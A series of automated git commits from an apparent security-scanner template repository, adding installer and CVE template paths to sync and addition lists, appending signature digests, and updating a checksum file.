b/.github/workflows/templates-sync.yml @@ -18,12 +18,15 @@ on: - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' + - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' + - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' - 'http/misconfiguration/installer/stackposts-installer.yaml' + - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' From 6bd73cc13f9abda8fd748a7a5af9135ff1fe1613 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 07:59:38 +0000 Subject: [PATCH 414/847] Auto Template Signing [Wed May 29 07:59:38 UTC 2024] :robot: --- http/default-logins/ampjuke-default-login.yaml | 1 + http/exposed-panels/busybox-repository-browser.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/default-logins/ampjuke-default-login.yaml b/http/default-logins/ampjuke-default-login.yaml index 125086f0a2..7cba568c40 100644 --- a/http/default-logins/ampjuke-default-login.yaml +++ b/http/default-logins/ampjuke-default-login.yaml @@ -59,3 +59,4 @@ http: regex: - 'name="uuid" value="([./a-z0-9-]+)">' internal: true +# digest: 490a0046304402201cc8ef1362131ffb99ceea9b2bd251961020c1a7d095a8588a269fff0b6bb66402205a78622f15123331eb83ca7cc6db264f141cf762eceaedbd64d3ccdb5b952b1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/busybox-repository-browser.yaml b/http/exposed-panels/busybox-repository-browser.yaml index c1a5b6144e..3c9139c8e6 100644 --- a/http/exposed-panels/busybox-repository-browser.yaml +++ b/http/exposed-panels/busybox-repository-browser.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100b22d49b77ae4a717d7e7bf4f90d59dd65306501adfe35f406cb7a666fb2ed05e022100b2a44a153e2fc81a920d6e89e4a879794531bffd514ff590fddc038237226b33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 69a425adecb5e434250bb21246fb4fbadd5ea528 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:00:01 +0000 Subject: [PATCH 415/847] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5f8b7b8774..8b16a590aa 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -10,6 +10,7 @@ on: - 'http/cves/2023/CVE-2023-3077.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' + - 'http/cves/2024/CVE-2024-3495.yaml' - 'http/cves/2024/CVE-2024-5230.yaml' - 'http/default-logins/ampjuke-default-login.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' @@ -24,6 +25,7 @@ on: - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' + - 'http/misconfiguration/installer/profittrailer-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' - 'http/misconfiguration/installer/stackposts-installer.yaml' - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' From 698e8ba89c5e9a3eddea89ea08a67ef2d28c859f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:00:11 +0000 Subject: [PATCH 416/847] Auto Generated New Template Addition List [Wed May 29 08:00:11 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 87d2a683f8..d26ee86c90 100644 --- a/.new-additions +++ b/.new-additions @@ -18,11 +18,13 @@ http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml +http/misconfiguration/installer/glpi-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/misconfiguration/installer/profittrailer-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml http/misconfiguration/installer/stackposts-installer.yaml +http/misconfiguration/installer/tastyigniter-installer.yaml http/misconfiguration/installer/virtual-smartzone-installer.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml From 3d85c3b4dc2b94bb384649a89645ba36f0352226 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:00:16 +0000 Subject: [PATCH 417/847] Auto Generated Templates Checksum [Wed May 29 08:00:16 UTC 2024] :robot: --- templates-checksum.txt | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 49445ec6c1..e643c865ce 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3308,6 +3308,7 @@ http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c +http/cves/2024/CVE-2024-3495.yaml:060d2ed065c0100e109bbe6f050daabaa92b64db http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b http/cves/2024/CVE-2024-4956.yaml:930d1f49e8fdefd809f7aea2f0dddc2f3a160d09 @@ -3325,7 +3326,7 @@ http/default-logins/alibaba/canal-default-login.yaml:53bee91e5473ba3be493bdb74fc http/default-logins/allnet/allnet-default-login.yaml:bdc1b0fae7b08909a071f9b452800f8b37b4b2ea http/default-logins/alphaweb/alphaweb-default-login.yaml:c70e96a6e9ed34b5fe721cc25c004aa4c66a59c9 http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7369f02f4a8cfe -http/default-logins/ampjuke-default-login.yaml:dcd5fb3f7636832265548e0ab1c8d4dba89a11a4 +http/default-logins/ampjuke-default-login.yaml:5e1655762197af52d69e68706d186e6043549f2c http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b http/default-logins/apache/apisix-default-login.yaml:88d0d5d11425c2cadb204d0afb7b26d8df4376fe http/default-logins/apache/dolphinscheduler-default-login.yaml:1e4031c994ea6c6aa571dad9a5e7ccbf908e2251 @@ -3631,7 +3632,7 @@ http/exposed-panels/bonobo-server-panel.yaml:43a9e4867d71b96735ed7204ac8188a73e8 http/exposed-panels/bookstack-panel.yaml:6aa200c15b16ebfaa41c6ede6c814ccae56115fb http/exposed-panels/buddy-panel.yaml:612c814fabd73cab9fbcabc30169454db23c583b http/exposed-panels/buildbot-panel.yaml:c61b26d17d36adafb7f6642b12d64078e3aebc15 -http/exposed-panels/busybox-repository-browser.yaml:fedbe7dab622d91bf01cf75e62d0a9637d975736 +http/exposed-panels/busybox-repository-browser.yaml:39ae82f90249996e5c2d4fcb342cbcc033ddf8b0 http/exposed-panels/bynder-panel.yaml:6cb1f105a7d932e3123174ce57392fd0e4238a9d http/exposed-panels/c2/ares-rat-c2.yaml:1aac3bf878b995e385e7543bf774dd43c1c9a498 http/exposed-panels/c2/brute-ratel-c4.yaml:f2c6438699c51caca084e6ceddebfc4caf1414e2 @@ -5437,6 +5438,7 @@ http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44 http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 http/misconfiguration/installer/gitea-installer.yaml:5e6a8a0d61e3cf52bdaeb96c7a1784a046292e7e +http/misconfiguration/installer/glpi-installer.yaml:7f389d140c85cf0335612ea2e2057de050230746 http/misconfiguration/installer/gogs-installer.yaml:761e7ee7354915c029670f36c1360b8d8bb97a4d http/misconfiguration/installer/growi-installer.yaml:4deae8663c130d2b6fa7d6c62da70b3474c2efb3 http/misconfiguration/installer/ids-skills-installer.yaml:ff7fee92596ae2212f48a0b75bfce6defd2f8baa @@ -8586,7 +8588,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:603a48ec1641792e0b75038a63d296610d4028b3 +templates-checksum.txt:b74a4a853bcdd22045ca7915f9b478574c01f88c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 30877c407e1fc9862cca609591713927e480622c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:00:30 +0000 Subject: [PATCH 418/847] Auto Generated New Template Addition List [Wed May 29 08:00:30 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d26ee86c90..038fc0cfd4 100644 --- a/.new-additions +++ b/.new-additions @@ -25,6 +25,7 @@ http/misconfiguration/installer/profittrailer-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml http/misconfiguration/installer/stackposts-installer.yaml http/misconfiguration/installer/tastyigniter-installer.yaml +http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml http/misconfiguration/installer/virtual-smartzone-installer.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml From 923d4ad63cc87e36d93ca0fa0388a5d58180ee49 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:00:49 +0000 Subject: [PATCH 419/847] Auto Generated Templates Checksum [Wed May 29 08:00:49 UTC 2024] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e643c865ce..d86afa27eb 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5512,6 +5512,7 @@ http/misconfiguration/installer/sugarcrm-install.yaml:a253a2bb6995ab8232ce780dcf http/misconfiguration/installer/suitecrm-installer.yaml:0c39360372f4dd838d49b82ba353aecb8a6d6b3b http/misconfiguration/installer/sumowebtools-installer.yaml:fd2852a171b68f3b8f5290b80da4c84daa1afbcc http/misconfiguration/installer/tasmota-install.yaml:f77cc6de67828f45e5d0e528f773aa565679bd65 +http/misconfiguration/installer/tastyigniter-installer.yaml:24ae629a775107fe9bcc658e1377f483f864c4a9 http/misconfiguration/installer/tautulli-install.yaml:babc01a81e184ecadb2cc433e7b0cdcc1195eb8b http/misconfiguration/installer/testrail-install.yaml:ffd3e6d389e273255f6e6b97ef617680c3336895 http/misconfiguration/installer/tiny-rss-installer.yaml:fffe28f654914f0e91b3afe7aeecd942d1fb1705 @@ -5520,6 +5521,7 @@ http/misconfiguration/installer/turbo-website-installer.yaml:c860118d4335fffd299 http/misconfiguration/installer/typo3-installer.yaml:316fc6ce687dbbdde1d1fe5bbff8b7224c7ed4d1 http/misconfiguration/installer/umbraco-installer.yaml:468d300c5078cf4f972eabf51e9452bcdc8ffbb4 http/misconfiguration/installer/unifi-wizard-install.yaml:e7bd820e772c8d6c4b72b9fc69809ef8561d251e +http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml:9100af130cdecc1b9e7ac7c7201684997e51a037 http/misconfiguration/installer/uvdesk-install.yaml:e09e2da072d150ee5a8ad20f68a16d026cd20837 http/misconfiguration/installer/vironeer-installer.yaml:bbb96915ddb6312c37d73639468ac9454873e277 http/misconfiguration/installer/virtual-smartzone-installer.yaml:eb1595d8a2e010eb1afea3ce0c3469ddb2236066 @@ -8588,7 +8590,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b74a4a853bcdd22045ca7915f9b478574c01f88c +templates-checksum.txt:b9be7ce4b854e5573731b727c6a03d1e00b42321 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f5f892d7d7d0d0ba93829b76936208e618d54381 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:01:05 +0000 Subject: [PATCH 420/847] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 8b16a590aa..b2ce32abd4 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,11 +23,13 @@ on: - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' + - 'http/misconfiguration/installer/glpi-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/misconfiguration/installer/profittrailer-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' - 'http/misconfiguration/installer/stackposts-installer.yaml' + - 'http/misconfiguration/installer/tastyigniter-installer.yaml' - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' From f1349aebb812927a9da39c765d53db4e42e76d11 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:01:31 +0000 Subject: [PATCH 421/847] Auto Generated Templates Checksum [Wed May 29 08:01:31 UTC 2024] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d86afa27eb..6697917805 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5425,6 +5425,7 @@ http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8 http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36 http/misconfiguration/installer/easy-viserlabs-installer.yaml:7ddea4c605e0c2129861c43f62aa0988f8883b51 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 +http/misconfiguration/installer/ejbca-enterprise-installer.yaml:c7a7e5fcbedd43a6ca347ae9acba4579fdb1ed24 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a @@ -5445,6 +5446,7 @@ http/misconfiguration/installer/ids-skills-installer.yaml:ff7fee92596ae2212f48a0 http/misconfiguration/installer/impresspages-installer.yaml:a202181818bcfe8005a744f81027dc06de05dc40 http/misconfiguration/installer/imprivata-installer.yaml:876cea672f3efc0085a779a6d8c9305c994a2ea3 http/misconfiguration/installer/indegy-sensor-installer.yaml:deaa2d09c184bd9eee230c651699d1f1ccc8afcc +http/misconfiguration/installer/invicti-enterprise-installer.yaml:51eab6643b190341bccd5bfb787b27bfcbf36e71 http/misconfiguration/installer/jira-setup.yaml:dd2b7c8705de134a0832d31e71627a28afd37e14 http/misconfiguration/installer/joomla-installer.yaml:3c61ec0cf21b65088e1392f2f5ce5cbed4bfb17a http/misconfiguration/installer/klr300n-installer.yaml:417ba88bb2ce1a6aced0dfacfa77021a62f73487 @@ -8590,7 +8592,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b9be7ce4b854e5573731b727c6a03d1e00b42321 +templates-checksum.txt:e63cdb2330891dc01a81e7bbef7753c3694aa57a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6ccc0a118b25c237eb27a36e83575cd9e488fff6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:01:44 +0000 Subject: [PATCH 422/847] Auto Generated New Template Addition List [Wed May 29 08:01:44 UTC 2024] :robot: --- .new-additions | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.new-additions b/.new-additions index 038fc0cfd4..0ba334f7b6 100644 --- a/.new-additions +++ b/.new-additions @@ -16,9 +16,13 @@ http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml +http/misconfiguration/installer/ejbca-enterprise-installer.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/glpi-installer.yaml +http/misconfiguration/installer/invicti-enterprise-installer.yaml +http/misconfiguration/installer/invoice-ninja-installer.yaml +http/misconfiguration/installer/jfa-go-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/misconfiguration/installer/profittrailer-installer.yaml From 420b5c9ae3b55b08a3f05ca3a4c72df5a080fb58 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:02:03 +0000 Subject: [PATCH 424/847] Auto Template Signing [Wed May 29 08:02:03 UTC 2024] :robot: --- http/cves/2024/CVE-2024-3495.yaml | 1 + http/misconfiguration/installer/activecollab-installer.yaml | 1 + http/misconfiguration/installer/glpi-installer.yaml | 1 + http/misconfiguration/installer/onlyoffice-installer.yaml | 1 + http/misconfiguration/installer/profittrailer-installer.yaml | 1 + http/misconfiguration/installer/virtual-smartzone-installer.yaml | 1 + 6 files changed, 6 insertions(+) diff --git a/http/cves/2024/CVE-2024-3495.yaml b/http/cves/2024/CVE-2024-3495.yaml index 076e2dc12d..a3fa7388ff 100644 --- a/http/cves/2024/CVE-2024-3495.yaml +++ b/http/cves/2024/CVE-2024-3495.yaml @@ -54,3 +54,4 @@ http: regex: - '"nonce":"(\S*)"' internal: true +# digest: 4a0a00473045022059c57bd6c82e74ce84c99c339ccc1b107f2cb6aec5fa053b73b7f1aaa77003ac022100d3b0c3a42c10b8421de519da2237f3784bfd8b8a8d01f55fc6b08c58c59860c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/activecollab-installer.yaml b/http/misconfiguration/installer/activecollab-installer.yaml index fc9b129292..e42398ec1b 100644 --- a/http/misconfiguration/installer/activecollab-installer.yaml +++ b/http/misconfiguration/installer/activecollab-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022034b524d9ad8e4a38f42b3f47439047de2cdf505cea9c303acbcf771f8620210e02200e0c6e8c487c6c1d0d03d1b140b0914cd8e9df100b051d57a6c5f2047d14b2fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/glpi-installer.yaml b/http/misconfiguration/installer/glpi-installer.yaml index 9db17a527d..e65f9aaa2e 100644 --- a/http/misconfiguration/installer/glpi-installer.yaml +++ b/http/misconfiguration/installer/glpi-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100fab1664db0007ba958243c418dd797ae303186f6f4aef52864c05be2af3488b5022100eae3c16b34681d89735d78279ed5965fc9993f5e901ffcf0e8b06a2ce408dd88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/onlyoffice-installer.yaml b/http/misconfiguration/installer/onlyoffice-installer.yaml index a8b696489d..757c6657d8 100644 --- a/http/misconfiguration/installer/onlyoffice-installer.yaml +++ b/http/misconfiguration/installer/onlyoffice-installer.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 4b0a0048304602210089667df0b5585937f0f1eadad5928c4dd0ba96004a3785344b4b1e9dc07f1f80022100b7c68ecd2a2393a6e551075e175accdac85aa4ebc9673b081aff7944f5a877e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/profittrailer-installer.yaml b/http/misconfiguration/installer/profittrailer-installer.yaml index ed33927a01..9b73b8c8a6 100644 --- a/http/misconfiguration/installer/profittrailer-installer.yaml +++ b/http/misconfiguration/installer/profittrailer-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100bfeeeb0cf97f5d58c5ccd475480fadeae1023eb090798a02daa9ef76244d77ff0220343fd9ccc366f093849ef30ebba874a66e1abc777191c1883f2e507bff2ee338:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/virtual-smartzone-installer.yaml b/http/misconfiguration/installer/virtual-smartzone-installer.yaml index 31adce8ade..29d3380861 100644 --- a/http/misconfiguration/installer/virtual-smartzone-installer.yaml +++ b/http/misconfiguration/installer/virtual-smartzone-installer.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022009e0ca1dc058fbbf4b9f7f8404d01720418c9739a270a20eb0a4e5eb757908df02202dec851dfee50d028615def5235cae1d3cec190ebbfa8fdcf48d4bd396a49615:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8e0012943c598c09d49ad5e4427473fb0e0f9767 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:02:25 +0000 Subject: [PATCH 425/847] Syncing Templates --- .github/workflows/templates-sync.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b2ce32abd4..95fe545e9c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -21,15 +21,20 @@ on: - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' + - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/glpi-installer.yaml' + - 'http/misconfiguration/installer/invicti-enterprise-installer.yaml' + - 'http/misconfiguration/installer/invoice-ninja-installer.yaml' + - 'http/misconfiguration/installer/jfa-go-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/misconfiguration/installer/profittrailer-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' - 'http/misconfiguration/installer/stackposts-installer.yaml' - 'http/misconfiguration/installer/tastyigniter-installer.yaml' + - 'http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml' - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' From bd163a5f93498b2351ecfe4fded7850c587d9ddf Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:02:37 +0000 Subject: [PATCH 426/847] Auto Generated New Template Addition List [Wed May 29 08:02:37 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 0ba334f7b6..8b4a34a472 100644 --- a/.new-additions +++ b/.new-additions @@ -23,10 +23,12 @@ http/misconfiguration/installer/glpi-installer.yaml http/misconfiguration/installer/invicti-enterprise-installer.yaml http/misconfiguration/installer/invoice-ninja-installer.yaml http/misconfiguration/installer/jfa-go-installer.yaml +http/misconfiguration/installer/justfans-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/misconfiguration/installer/profittrailer-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml +http/misconfiguration/installer/snipe-it-installer.yaml http/misconfiguration/installer/stackposts-installer.yaml http/misconfiguration/installer/tastyigniter-installer.yaml http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml From d77b0d10ef4292b774ed4fcaf539a72fb9bd2453 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:02:44 +0000 Subject: [PATCH 427/847] Auto Generated Templates Checksum [Wed May 29 08:02:44 UTC 2024] :robot: --- templates-checksum.txt | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6697917805..ae73330b0c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3308,7 +3308,7 @@ http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c -http/cves/2024/CVE-2024-3495.yaml:060d2ed065c0100e109bbe6f050daabaa92b64db +http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b http/cves/2024/CVE-2024-4956.yaml:930d1f49e8fdefd809f7aea2f0dddc2f3a160d09 @@ -5394,7 +5394,7 @@ http/misconfiguration/https-to-http-redirect.yaml:cccf8e9ceb416d8e224b314e9952d6 http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463 http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1 http/misconfiguration/imgproxy-unauth.yaml:2eb18535d095cf898aa3cd76128382ff8e92acff -http/misconfiguration/installer/activecollab-installer.yaml:36c1b4c95e44199ea20bc210c89205f8bef1cf2b +http/misconfiguration/installer/activecollab-installer.yaml:842f496ce5d4b2c2dc3eed0109a75a5c2cd096a3 http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 http/misconfiguration/installer/akeeba-installer.yaml:56fc3c8f70ae91e8cb4207b97c0b088a845537f4 http/misconfiguration/installer/alma-installer.yaml:50fb01e501f60ce17284f44c30bf672eb6986d6a @@ -5439,7 +5439,7 @@ http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44 http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 http/misconfiguration/installer/gitea-installer.yaml:5e6a8a0d61e3cf52bdaeb96c7a1784a046292e7e -http/misconfiguration/installer/glpi-installer.yaml:7f389d140c85cf0335612ea2e2057de050230746 +http/misconfiguration/installer/glpi-installer.yaml:eff46c69565c0aea0245c4fde82e59b5e0fb2f00 http/misconfiguration/installer/gogs-installer.yaml:761e7ee7354915c029670f36c1360b8d8bb97a4d http/misconfiguration/installer/growi-installer.yaml:4deae8663c130d2b6fa7d6c62da70b3474c2efb3 http/misconfiguration/installer/ids-skills-installer.yaml:ff7fee92596ae2212f48a0b75bfce6defd2f8baa @@ -5447,8 +5447,11 @@ http/misconfiguration/installer/impresspages-installer.yaml:a202181818bcfe8005a7 http/misconfiguration/installer/imprivata-installer.yaml:876cea672f3efc0085a779a6d8c9305c994a2ea3 http/misconfiguration/installer/indegy-sensor-installer.yaml:deaa2d09c184bd9eee230c651699d1f1ccc8afcc http/misconfiguration/installer/invicti-enterprise-installer.yaml:51eab6643b190341bccd5bfb787b27bfcbf36e71 +http/misconfiguration/installer/invoice-ninja-installer.yaml:1cc5ec76b7ec954a5a2a707c2e558ecff5f018ba +http/misconfiguration/installer/jfa-go-installer.yaml:55a1d406199affc4050e2691de8a844ed5828791 http/misconfiguration/installer/jira-setup.yaml:dd2b7c8705de134a0832d31e71627a28afd37e14 